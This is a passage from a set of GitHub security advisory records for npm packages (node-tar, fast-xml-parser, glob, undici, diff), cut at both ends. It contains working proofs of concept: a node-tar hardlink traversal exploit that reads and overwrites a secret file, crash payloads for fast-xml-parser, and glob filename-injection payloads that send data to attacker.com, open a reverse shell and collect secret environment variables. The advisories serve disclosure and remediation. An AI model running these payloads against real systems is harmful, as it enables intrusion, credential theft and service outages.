      "url": "https://github.com/NaturalIntelligence/fast-xml-parser"
    },
    {
      "type": "WEB",
      "url": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v4.5.5"
    },
    {
      "type": "WEB",
      "url": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.5.6"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "fast-xml-parser affected by numeric entity expansion bypassing all entity expansion limits (incomplete fix for CVE-2026-26278)"
}

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "tar"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "7.5.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-24842"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-59"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-28T16:35:31Z",
    "nvd_published_at": "2026-01-28T01:16:14Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nnode-tar contains a vulnerability where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory.\n\n### Details\nThe vulnerability exists in `lib/unpack.js`. When extracting a hardlink, two functions handle the linkpath differently:\n\n**Security check in `[STRIPABSOLUTEPATH]`:**\n```javascript\nconst entryDir = path.posix.dirname(entry.path);\nconst resolved = path.posix.normalize(path.posix.join(entryDir, linkpath));\nif (resolved.startsWith(\u0027../\u0027)) { /* block */ }\n```\n\n**Hardlink creation in `[HARDLINK]`:**\n```javascript\nconst linkpath = path.resolve(this.cwd, entry.linkpath);\nfs.linkSync(linkpath, dest);\n```\n\n**Example:** An application extracts a TAR using `tar.extract({ cwd: \u0027/var/app/uploads/\u0027 })`. The TAR contains entry `a/b/c/d/x` as a hardlink to `../../../../etc/passwd`.\n\n- **Security check** resolves the linkpath relative to the entry\u0027s parent directory: `a/b/c/d/ + ../../../../etc/passwd` = `etc/passwd`. No `../` prefix, so it **passes**.\n\n- **Hardlink creation** resolves the linkpath relative to the extraction directory (`this.cwd`): `/var/app/uploads/ + ../../../../etc/passwd` = `/etc/passwd`. This **escapes** to the system\u0027s `/etc/passwd`.\n\nThe security check and hardlink creation use different starting points (entry directory `a/b/c/d/` vs extraction directory `/var/app/uploads/`), so the same linkpath can pass validation but still escape. The deeper the entry path, the more levels an attacker can escape.\n\n### PoC\n#### Setup\n\nCreate a new directory with these files:\n\n```\npoc/\n\u251c\u2500\u2500 package.json\n\u251c\u2500\u2500 secret.txt          \u2190 sensitive file (target)\n\u251c\u2500\u2500 server.js           \u2190 vulnerable server\n\u251c\u2500\u2500 create-malicious-tar.js\n\u251c\u2500\u2500 verify.js\n\u2514\u2500\u2500 uploads/            \u2190 created automatically by server.js\n    \u2514\u2500\u2500 (extracted files go here)\n```\n\n**package.json**\n```json\n{ \"dependencies\": { \"tar\": \"^7.5.0\" } }\n```\n\n**secret.txt** (sensitive file outside uploads/)\n```\nDATABASE_PASSWORD=supersecret123\n```\n\n**server.js** (vulnerable file upload server)\n```javascript\nconst http = require(\u0027http\u0027);\nconst fs = require(\u0027fs\u0027);\nconst path = require(\u0027path\u0027);\nconst tar = require(\u0027tar\u0027);\n\nconst PORT = 3000;\nconst UPLOAD_DIR = path.join(__dirname, \u0027uploads\u0027);\nfs.mkdirSync(UPLOAD_DIR, { recursive: true });\n\nhttp.createServer((req, res) =\u003e {\n  if (req.method === \u0027POST\u0027 \u0026\u0026 req.url === \u0027/upload\u0027) {\n    const chunks = [];\n    req.on(\u0027data\u0027, c =\u003e chunks.push(c));\n    req.on(\u0027end\u0027, async () =\u003e {\n      fs.writeFileSync(path.join(UPLOAD_DIR, \u0027upload.tar\u0027), Buffer.concat(chunks));\n      await tar.extract({ file: path.join(UPLOAD_DIR, \u0027upload.tar\u0027), cwd: UPLOAD_DIR });\n      res.end(\u0027Extracted\\n\u0027);\n    });\n  } else if (req.method === \u0027GET\u0027 \u0026\u0026 req.url === \u0027/read\u0027) {\n    // Simulates app serving extracted files (e.g., file download, static assets)\n    const targetPath = path.join(UPLOAD_DIR, \u0027d\u0027, \u0027x\u0027);\n    if (fs.existsSync(targetPath)) {\n      res.end(fs.readFileSync(targetPath));\n    } else {\n      res.end(\u0027File not found\\n\u0027);\n    }\n  } else if (req.method === \u0027POST\u0027 \u0026\u0026 req.url === \u0027/write\u0027) {\n    // Simulates app writing to extracted file (e.g., config update, log append)\n    const chunks = [];\n    req.on(\u0027data\u0027, c =\u003e chunks.push(c));\n    req.on(\u0027end\u0027, () =\u003e {\n      const targetPath = path.join(UPLOAD_DIR, \u0027d\u0027, \u0027x\u0027);\n      if (fs.existsSync(targetPath)) {\n        fs.writeFileSync(targetPath, Buffer.concat(chunks));\n        res.end(\u0027Written\\n\u0027);\n      } else {\n        res.end(\u0027File not found\\n\u0027);\n      }\n    });\n  } else {\n    res.end(\u0027POST /upload, GET /read, or POST /write\\n\u0027);\n  }\n}).listen(PORT, () =\u003e console.log(`http://localhost:${PORT}`));\n```\n\n**create-malicious-tar.js** (attacker creates exploit TAR)\n```javascript\nconst fs = require(\u0027fs\u0027);\n\nfunction tarHeader(name, type, linkpath = \u0027\u0027, size = 0) {\n  const b = Buffer.alloc(512, 0);\n  b.write(name, 0); b.write(\u00270000644\u0027, 100); b.write(\u00270000000\u0027, 108);\n  b.write(\u00270000000\u0027, 116); b.write(size.toString(8).padStart(11, \u00270\u0027), 124);\n  b.write(Math.floor(Date.now()/1000).toString(8).padStart(11, \u00270\u0027), 136);\n  b.write(\u0027        \u0027, 148);\n  b[156] = type === \u0027dir\u0027 ? 53 : type === \u0027link\u0027 ? 49 : 48;\n  if (linkpath) b.write(linkpath, 157);\n  b.write(\u0027ustar\\x00\u0027, 257); b.write(\u002700\u0027, 263);\n  let sum = 0; for (let i = 0; i \u003c 512; i++) sum += b[i];\n  b.write(sum.toString(8).padStart(6, \u00270\u0027) + \u0027\\x00 \u0027, 148);\n  return b;\n}\n\n// Hardlink escapes to parent directory\u0027s secret.txt\nfs.writeFileSync(\u0027malicious.tar\u0027, Buffer.concat([\n  tarHeader(\u0027d/\u0027, \u0027dir\u0027),\n  tarHeader(\u0027d/x\u0027, \u0027link\u0027, \u0027../secret.txt\u0027),\n  Buffer.alloc(1024)\n]));\nconsole.log(\u0027Created malicious.tar\u0027);\n```\n\n#### Run\n\n```bash\n# Setup\nnpm install\necho \"DATABASE_PASSWORD=supersecret123\" \u003e secret.txt\n\n# Terminal 1: Start server\nnode server.js\n\n# Terminal 2: Execute attack\nnode create-malicious-tar.js\ncurl -X POST --data-binary @malicious.tar http://localhost:3000/upload\n\n# READ ATTACK: Steal secret.txt content via the hardlink\ncurl http://localhost:3000/read\n# Returns: DATABASE_PASSWORD=supersecret123\n\n# WRITE ATTACK: Overwrite secret.txt through the hardlink\ncurl -X POST -d \"PWNED\" http://localhost:3000/write\n\n# Confirm secret.txt was modified\ncat secret.txt\n```\n### Impact\n\nAn attacker can craft a malicious TAR archive that, when extracted by an application using node-tar, creates hardlinks that escape the extraction directory. This enables:\n\n**Immediate (Read Attack):** If the application serves extracted files, attacker can read any file readable by the process.\n\n**Conditional (Write Attack):** If the application later writes to the hardlink path, it modifies the target file outside the extraction directory.\n\n### Remote Code Execution / Server Takeover\n\n| Attack Vector | Target File | Result |\n|--------------|-------------|--------|\n| SSH Access | `~/.ssh/authorized_keys` | Direct shell access to server |\n| Cron Backdoor | `/etc/cron.d/*`, `~/.crontab` | Persistent code execution |\n| Shell RC Files | `~/.bashrc`, `~/.profile` | Code execution on user login |\n| Web App Backdoor | Application `.js`, `.php`, `.py` files | Immediate RCE via web requests |\n| Systemd Services | `/etc/systemd/system/*.service` | Code execution on service restart |\n| User Creation | `/etc/passwd` (if running as root) | Add new privileged user |\n\n## Data Exfiltration \u0026 Corruption\n\n1. **Overwrite arbitrary files** via hardlink escape + subsequent write operations\n2. **Read sensitive files** by creating hardlinks that point outside extraction directory\n3. **Corrupt databases** and application state\n4. **Steal credentials** from config files, `.env`, secrets",
  "id": "GHSA-34x7-hfp2-rc4v",
  "modified": "2026-01-28T16:35:31Z",
  "published": "2026-01-28T16:35:31Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-34x7-hfp2-rc4v"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24842"
    },
    {
      "type": "WEB",
      "url": "https://github.com/isaacs/node-tar/commit/f4a7aa9bc3d717c987fdf1480ff7a64e87ffdb46"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/isaacs/node-tar"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "node-tar Vulnerable to Arbitrary File Creation/Overwrite via Hardlink Path Traversal"
}

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.3.3"
      },
      "package": {
        "ecosystem": "npm",
        "name": "fast-xml-parser"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.9"
            },
            {
              "fixed": "5.3.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25128"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-248"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-30T20:10:14Z",
    "nvd_published_at": "2026-01-30T16:16:14Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nA RangeError vulnerability exists in the numeric entity processing of fast-xml-parser when parsing XML with out-of-range entity code points (e.g., `\u0026#9999999;` or `\u0026#xFFFFFF;`). This causes the parser to throw an uncaught exception, crashing any application that processes untrusted XML input.\n\n### Details\nThe vulnerability exists in `/src/xmlparser/OrderedObjParser.js` at lines 44-45:\n\n```javascript\n\"num_dec\": { regex: /\u0026#([0-9]{1,7});/g, val : (_, str) =\u003e String.fromCodePoint(Number.parseInt(str, 10)) },\n\"num_hex\": { regex: /\u0026#x([0-9a-fA-F]{1,6});/g, val : (_, str) =\u003e String.fromCodePoint(Number.parseInt(str, 16)) },\n```\n\nThe `String.fromCodePoint()` method throws a `RangeError` when the code point exceeds the valid Unicode range (0 to 0x10FFFF / 1114111). The regex patterns can capture values far exceeding this:\n- `[0-9]{1,7}` matches up to 9,999,999\n- `[0-9a-fA-F]{1,6}` matches up to 0xFFFFFF (16,777,215)\n\nThe entity replacement in `replaceEntitiesValue()` (line 452) has no try-catch:\n\n```javascript\nval = val.replace(entity.regex, entity.val);\n```\n\nThis causes the RangeError to propagate uncaught, crashing the parser and any application using it.\n### PoC\n#### Setup\n\nCreate a directory with these files:\n\n```\npoc/\n\u251c\u2500\u2500 package.json\n\u251c\u2500\u2500 server.js\n```\n\n**package.json**\n```json\n{ \"dependencies\": { \"fast-xml-parser\": \"^5.3.3\" } }\n```\n\n**server.js**\n```javascript\nconst http = require(\u0027http\u0027);\nconst { XMLParser } = require(\u0027fast-xml-parser\u0027);\n\nconst parser = new XMLParser({ processEntities: true, htmlEntities: true });\n\nhttp.createServer((req, res) =\u003e {\n  if (req.method === \u0027POST\u0027 \u0026\u0026 req.url === \u0027/parse\u0027) {\n    let body = \u0027\u0027;\n    req.on(\u0027data\u0027, c =\u003e body += c);\n    req.on(\u0027end\u0027, () =\u003e {\n      const result = parser.parse(body);  // No try-catch - will crash!\n      res.end(JSON.stringify(result));\n    });\n  } else {\n    res.end(\u0027POST /parse with XML body\u0027);\n  }\n}).listen(3000, () =\u003e console.log(\u0027http://localhost:3000\u0027));\n```\n\n#### Run\n\n```bash\n# Setup\nnpm install\n\n# Terminal 1: Start server\nnode server.js\n\n# Terminal 2: Send malicious payload (server will crash)\ncurl -X POST -H \"Content-Type: application/xml\" -d \u0027\u003c?xml version=\"1.0\"?\u003e\u003croot\u003e\u0026#9999999;\u003c/root\u003e\u0027 http://localhost:3000/parse\n``` \n#### Result\n\nServer crashes with:\n```\nRangeError: Invalid code point 9999999\n```\n\n#### Alternative Payloads\n\n```xml\n\u003c!-- Hex variant --\u003e\n\u003c?xml version=\"1.0\"?\u003e\u003croot\u003e\u0026#xFFFFFF;\u003c/root\u003e\n\n\u003c!-- In attribute --\u003e\n\u003c?xml version=\"1.0\"?\u003e\u003croot attr=\"\u0026#9999999;\"/\u003e\n```\n\n### Impact\n*Denial of Service (DoS):** Any application using fast-xml-parser to process untrusted XML input will crash when encountering malformed numeric entities. This affects:\n\n- **API servers** accepting XML payloads\n- **File processors** parsing uploaded XML files\n- **Message queues** consuming XML messages\n- **RSS/Atom feed parsers**\n- **SOAP/XML-RPC services**\n\nA single malicious request is sufficient to crash the entire Node.js process, causing service disruption until manual restart.",
  "id": "GHSA-37qj-frw5-hhjh",
  "modified": "2026-02-11T23:13:02Z",
  "published": "2026-01-30T20:10:14Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-37qj-frw5-hhjh"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25128"
    },
    {
      "type": "WEB",
      "url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/4e387f61c4a5cef792f6a2f42467013290bf95dc"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/NaturalIntelligence/fast-xml-parser"
    },
    {
      "type": "WEB",
      "url": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.4"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "fast-xml-parser has RangeError DoS Numeric Entities Bug"
}

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "glob"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "11.0.0"
            },
            {
              "fixed": "11.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "glob"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "10.2.0"
            },
            {
              "fixed": "10.5.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-64756"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-78"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-11-17T17:38:56Z",
    "nvd_published_at": "2025-11-17T18:15:58Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nThe glob CLI contains a command injection vulnerability in its `-c/--cmd` option that allows arbitrary command execution when processing files with malicious names. When `glob -c \u003ccommand\u003e \u003cpatterns\u003e` is used, matched filenames are passed to a shell with `shell: true`, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges.\n\n### Details\n\n**Root Cause:**\nThe vulnerability exists in `src/bin.mts:277` where the CLI collects glob matches and executes the supplied command using `foregroundChild()` with `shell: true`:\n\n```javascript\nstream.on(\u0027end\u0027, () =\u003e foregroundChild(cmd, matches, { shell: true }))\n```\n\n**Technical Flow:**\n1. User runs `glob -c \u003ccommand\u003e \u003cpattern\u003e` \n2. CLI finds files matching the pattern\n3. Matched filenames are collected into an array\n4. Command is executed with matched filenames as arguments using `shell: true`\n5. Shell interprets metacharacters in filenames as command syntax\n6. Malicious filenames execute arbitrary commands\n\n**Affected Component:**\n- **CLI Only:** The vulnerability affects only the command-line interface\n- **Library Safe:** The core glob library API (`glob()`, `globSync()`, streams/iterators) is not affected\n- **Shell Dependency:** Exploitation requires shell metacharacter support (primarily POSIX systems)\n\n**Attack Surface:**\n- Files with names containing shell metacharacters: `$()`, backticks, `;`, `\u0026`, `|`, etc.\n- Any directory where attackers can control filenames (PR branches, archives, user uploads)\n- CI/CD pipelines using `glob -c` on untrusted content\n\n### PoC\n\n**Setup Malicious File:**\n```bash\nmkdir test_directory \u0026\u0026 cd test_directory\n\n# Create file with command injection payload in filename\ntouch \u0027$(touch injected_poc)\u0027\n```\n\n**Trigger Vulnerability:**\n```bash\n# Run glob CLI with -c option\nnode /path/to/glob/dist/esm/bin.mjs -c echo \"**/*\"\n```\n\n**Result:**\n- The echo command executes normally\n- **Additionally:** The `$(touch injected_poc)` in the filename is evaluated by the shell\n- A new file `injected_poc` is created, proving command execution\n- Any command can be injected this way with full user privileges\n\n**Advanced Payload Examples:**\n\n**Data Exfiltration:**\n```bash\n# Filename: $(curl -X POST https://attacker.com/exfil -d \"$(whoami):$(pwd)\" \u003e /dev/null 2\u003e\u00261)\ntouch \u0027$(curl -X POST https://attacker.com/exfil -d \"$(whoami):$(pwd)\" \u003e /dev/null 2\u003e\u00261)\u0027\n```\n\n**Reverse Shell:**\n```bash\n# Filename: $(bash -i \u003e\u0026 /dev/tcp/attacker.com/4444 0\u003e\u00261)\ntouch \u0027$(bash -i \u003e\u0026 /dev/tcp/attacker.com/4444 0\u003e\u00261)\u0027\n```\n\n**Environment Variable Harvesting:**\n```bash\n# Filename: $(env | grep -E \"(TOKEN|KEY|SECRET)\" \u003e /tmp/secrets.txt)\ntouch \u0027$(env | grep -E \"(TOKEN|KEY|SECRET)\" \u003e /tmp/secrets.txt)\u0027\n```\n\n### Impact\n\n**Arbitrary Command Execution:**\n- Commands execute with full privileges of the user running glob CLI\n- No privilege escalation required - runs as current user\n- Access to environment variables, file system, and network\n\n**Real-World Attack Scenarios:**\n\n**1. CI/CD Pipeline Compromise:**\n- Malicious PR adds files with crafted names to repository\n- CI pipeline uses `glob -c` to process files (linting, testing, deployment)\n- Commands execute in CI environment with build secrets and deployment credentials\n- Potential for supply chain compromise through artifact tampering\n\n**2. Developer Workstation Attack:**\n- Developer clones repository or extracts archive containing malicious filenames\n- Local build scripts use `glob -c` for file processing\n- Developer machine compromise with access to SSH keys, tokens, local services\n\n**3. Automated Processing Systems:**\n- Services using glob CLI to process uploaded files or external content\n- File uploads with malicious names trigger command execution\n- Server-side compromise with potential for lateral movement\n\n**4. Supply Chain Poisoning:**\n- Malicious packages or themes include files with crafted names\n- Build processes using glob CLI automatically process these files\n- Wide distribution of compromise through package ecosystems\n\n**Platform-Specific Risks:**\n- **POSIX/Linux/macOS:** High risk due to flexible filename characters and shell parsing\n- **Windows:** Lower risk due to filename restrictions, but vulnerability persists with PowerShell, Git Bash, WSL\n- **Mixed Environments:** CI systems often use Linux containers regardless of developer platform\n\n### Affected Products\n\n- **Ecosystem:** npm\n- **Package name:** glob\n- **Component:** CLI only (`src/bin.mts`)\n- **Affected versions:** v10.2.0 through v11.0.3 (and likely later versions until patched)\n- **Introduced:** v10.2.0 (first release with CLI containing `-c/--cmd` option)\n- **Patched versions:** 11.1.0and 10.5.0\n\n**Scope Limitation:**\n- **Library API Not Affected:** Core glob functions (`glob()`, `globSync()`, async iterators) are safe\n- **CLI-Specific:** Only the command-line interface with `-c/--cmd` option is vulnerable\n\n### Remediation\n\n- Upgrade to `glob@10.5.0`, `glob@11.1.0`, or higher, as soon as possible.\n- If any `glob` CLI actions fail, then convert commands containing positional arguments, to use the `--cmd-arg`/`-g` option instead.\n- As a last resort, use `--shell` to maintain `shell:true` behavior until glob v12, but take care to ensure that no untrusted contents can possibly be encountered in the file path results.",
  "id": "GHSA-5j98-mcp5-4vw2",
  "modified": "2025-11-19T02:30:52Z",
  "published": "2025-11-17T17:38:56Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64756"
    },
    {
      "type": "WEB",
      "url": "https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f"
    },
    {
      "type": "WEB",
      "url": "https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/isaacs/node-glob"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "glob CLI: Command injection via -c/--cmd executes matches with shell:true"
}

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "undici"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "6.24.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "undici"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "7.0.0"
            },
            {
              "fixed": "7.24.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-2229"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-248"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-13T20:41:41Z",
    "nvd_published_at": "2026-03-12T21:16:25Z",
    "severity": "HIGH"
  },
  "details": "### Impact\n\nThe undici WebSocket client is vulnerable to a denial-of-service attack due to improper validation of the `server_max_window_bits` parameter in the permessage-deflate extension. When a WebSocket client connects to a server, it automatically advertises support for permessage-deflate compression. A malicious server can respond with an out-of-range `server_max_window_bits` value (outside zlib\u0027s valid range of 8-15). When the server subsequently sends a compressed frame, the client attempts to create a zlib InflateRaw instance with the invalid windowBits value, causing a synchronous RangeError exception that is not caught, resulting in immediate process termination.\n\nThe vulnerability exists because:\n\n1. The `isValidClientWindowBits()` function only validates that the value contains ASCII digits, not that it falls within the valid range 8-15\n2. The `createInflateRaw()` call is not wrapped in a try-catch block\n3. The resulting exception propagates up through the call stack and crashes the Node.js process\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_",
  "id": "GHSA-v9p9-hfj2-hcw8",
  "modified": "2026-03-13T20:41:41Z",
  "published": "2026-03-13T20:41:41Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nodejs/undici/security/advisories/GHSA-v9p9-hfj2-hcw8"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2229"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/3487486"
    },
    {
      "type": "WEB",
      "url": "https://cna.openjsf.org/security-advisories.html"
    },
    {
      "type": "WEB",
      "url": "https://datatracker.ietf.org/doc/html/rfc7692"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nodejs/undici"
    },
    {
      "type": "WEB",
      "url": "https://nodejs.org/api/zlib.html#class-zlibinflateraw"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Undici has Unhandled Exception in WebSocket Client Due to Invalid server_max_window_bits Validation"
}

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "undici"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "6.24.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "undici"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "7.0.0"
            },
            {
              "fixed": "7.24.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-1525"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-444"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-13T20:07:03Z",
    "nvd_published_at": "2026-03-12T20:16:02Z",
    "severity": "MODERATE"
  },
  "details": "### Impact\n\nUndici allows duplicate HTTP `Content-Length` headers when they are provided in an array with case-variant names (e.g., `Content-Length` and `content-length`). This produces malformed HTTP/1.1 requests with multiple conflicting `Content-Length` values on the wire.\n\n**Who is impacted:**\n  - Applications using `undici.request()`, `undici.Client`, or similar low-level APIs with headers passed as flat arrays\n  - Applications that accept user-controlled header names without case-normalization\n\n**Potential consequences:**\n  - **Denial of Service**: Strict HTTP parsers (proxies, servers) will reject requests with duplicate `Content-Length` headers (400 Bad Request)\n  - **HTTP Request Smuggling**: In deployments where an intermediary and backend interpret duplicate headers inconsistently (e.g., one uses the first value, the other uses the last), this can enable request smuggling attacks leading to ACL bypass, cache poisoning, or credential hijacking\n\n### Patches\n\n Patched in the undici version v7.24.0 and v6.24.0. Users should upgrade to this version or later.\n\n### Workarounds\n\n  If upgrading is not immediately possible:\n\n  1. **Validate header names**: Ensure no duplicate `Content-Length` headers (case-insensitive) are present before passing headers to undici\n  2. **Use object format**: Pass headers as a plain object (`{ \u0027content-length\u0027: \u0027123\u0027 }`) rather than an array, which naturally deduplicates by key\n  3. **Sanitize user input**: If headers originate from user input, normalize header names to lowercase and reject duplicates",
  "id": "GHSA-2mjp-6q6p-2qxm",
  "modified": "2026-03-13T20:07:03Z",
  "published": "2026-03-13T20:07:03Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nodejs/undici/security/advisories/GHSA-2mjp-6q6p-2qxm"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1525"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/3556037"
    },
    {
      "type": "WEB",
      "url": "https://cna.openjsf.org/security-advisories.html"
    },
    {
      "type": "WEB",
      "url": "https://cwe.mitre.org/data/definitions/444.html"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nodejs/undici"
    },
    {
      "type": "WEB",
      "url": "https://www.rfc-editor.org/rfc/rfc9110.html#section-8.6"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Undici has an HTTP Request/Response Smuggling issue"
}

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "diff"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.0.0"
            },
            {
              "fixed": "8.0.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "diff"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "5.2.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "diff"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0"
            },
            {
              "fixed": "4.0.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "diff"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.5.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-24001"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333",
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-14T21:34:12Z",
    "nvd_published_at": "2026-01-22T03:15:47Z",
    "severity": "LOW"
  },
  "details": "### Impact\n\nAttempting to parse a patch whose filename headers contain the line break characters `\\r`, `\\u2028`, or `\\u2029` can cause the `parsePatch` method to enter an infinite loop. It then consumes memory without limit until the process crashes due to running out of memory.\n\nApplications are therefore likely to be vulnerable to a denial-of-service attack if they call `parsePatch` with a user-provided patch as input. A large payload is not needed to trigger the vulnerability, so size limits on user input do not provide any protection. Furthermore, some applications may be vulnerable even when calling `parsePatch` on a patch generated by the application itself if the user is nonetheless able to control the filename headers (e.g. by directly providing the filenames of the files to be diffed).\n\nThe `applyPatch` method is similarly affected if (and only if) called with a string representation of a patch as an argument, since under the hood it parses that string using `parsePatch`. Other methods of the library are unaffected.\n\nFinally, a second and lesser bug - a ReDOS - also exhibits when those same line break characters are present in a patch\u0027s *patch* header (also known as its \"leading garbage\"). A maliciously-crafted patch header of length *n* can take `parsePatch` O(*n*\u00b3) time to parse.\n\n### Patches\n\nAll vulnerabilities described are fixed in v8.0.3.\n\n### Workarounds\n\nIf using a version of jsdiff earlier than v8.0.3, do not attempt to parse patches that contain any of these characters: `\\r`, `\\u2028`, or `\\u2029`.\n\n### References\n\nPR that fixed the bug: https://github.com/kpdecker/jsdiff/pull/649\n\n\n### CVE Notes\n\nNote that although the advisory describes two bugs, they each enable exactly the same attack vector (that an attacker who controls input to `parsePatch` can cause a DOS). Fixing one bug without fixing the other therefore does not fix the vulnerability and does not provide any security benefit. Therefore we assume that the bugs cannot possibly constitute Independently Fixable Vulnerabilities in the sense of CVE CNA rule 4.2.11, but rather that this advisory is properly construed under the rules as describing a single Vulnerability.",
  "id": "GHSA-73rr-hh4g-fpgx",
  "modified": "2026-01-30T17:13:35Z",
  "published": "2026-01-14T21:34:12Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/kpdecker/jsdiff/security/advisories/GHSA-73rr-hh4g-fpgx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24001"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kpdecker/jsdiff/issues/653"
    },
